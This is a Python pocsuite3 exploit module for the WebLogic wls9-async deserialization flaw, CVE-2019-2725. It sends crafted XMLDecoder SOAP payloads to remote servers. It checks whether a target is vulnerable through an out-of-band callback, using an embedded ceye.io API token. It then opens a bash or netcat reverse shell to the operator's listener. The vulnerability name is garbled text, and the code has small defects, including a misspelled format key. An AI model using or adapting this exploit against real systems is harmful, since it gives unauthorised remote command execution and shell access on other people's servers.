import re
from collections import OrderedDict
from urllib.parse import urljoin
from pocsuite3.api import Output,POCBase,register_poc,requests,logger,POC_CATEGORY,OptDict
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.lib.utils import random_str
class DemoPOC(POCBase):
vulID = '97920'
version = '1'
author = ['seebug']
vulDate = '2019-04-17'
createDate = '2019-06-28'
updateDate = '2019-06-28'
references = ['https://www.seebug.org/vuldb/ssvid--97920']
name = "Welogic 10.3.6 10.12.1.3 wls9-async 鍙嶅簭鍒楀寲婕忔礊錛圕VE-2019-2725錛�"
appPowerLink = ''
appName = 'Weblogic'
appVersion = '10.3.6 12.1.3'
vulType = 'unserialization'
desc = '''
weblogic 123456789
'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.REMOTE
def _options(self):
o = OrderedDict()
payload = {
"nc" : "rm -f /tmp/p;mknod /tmp/p p && nc {0} {1} 0/tmp/p",
"bash" : "bash -i >& /dev/tcp/{0}/{1} 0>& 1",
}
o['command'] = OptDict(selected = "bash",default=payload)
return o
def get_check_payload(self,lhost,lport,random_uri):
check_payload = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object id="url" class="java.net.URL">
<string>http://{lhost}:{lport}/{random_uri}</string>
</object>
<object idref="url">
<void id="stream" method = "openStream" />
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''
return check_payload.format(lhost = lhost,lport = lport ,ramdom_uri = random_uri)
def _verify(self):
result = {}
veri_url = urljoin(self.url, '/async/AsyncResponseService')
random_uri = random_str(16)
check_host = "zum76x.ceye.io"
check_port = 80
payload = self.get_check_payload(check_host, check_port , random_uri)
headers = {
"User-Agent" : "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Content-Type" : "text/xml"
}
try:
requests.post(veri_url, data=payload, headers=headers)
resp = requests.get('http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request')
pattern = "http://{0}(:{1})?/{2}".format(check_host, check_port, random_uri)
if re.search(pattern , resp.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
return self._verify()
def get_shell_payload(self, cmd_base,cmd_opt, cmd_payload):
shell_payload= '''
soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''
return shell_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=cmd_payload)
def _shell(self):
vul_url = urljoin(self.url, '/async/AsyncResponseService')
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(get_listener_ip(), get_listener_port())
shell_payload = self.get_shell_payload('/bin/bash', '-c' ,cmd)
headers = {
"User-Agent" : "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Content-Type" : "text/xml"
}
try:
requests.post(vul_url, data=shell_payload, headers=headers)
except Exception as e:
logger.warn(str(e))
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
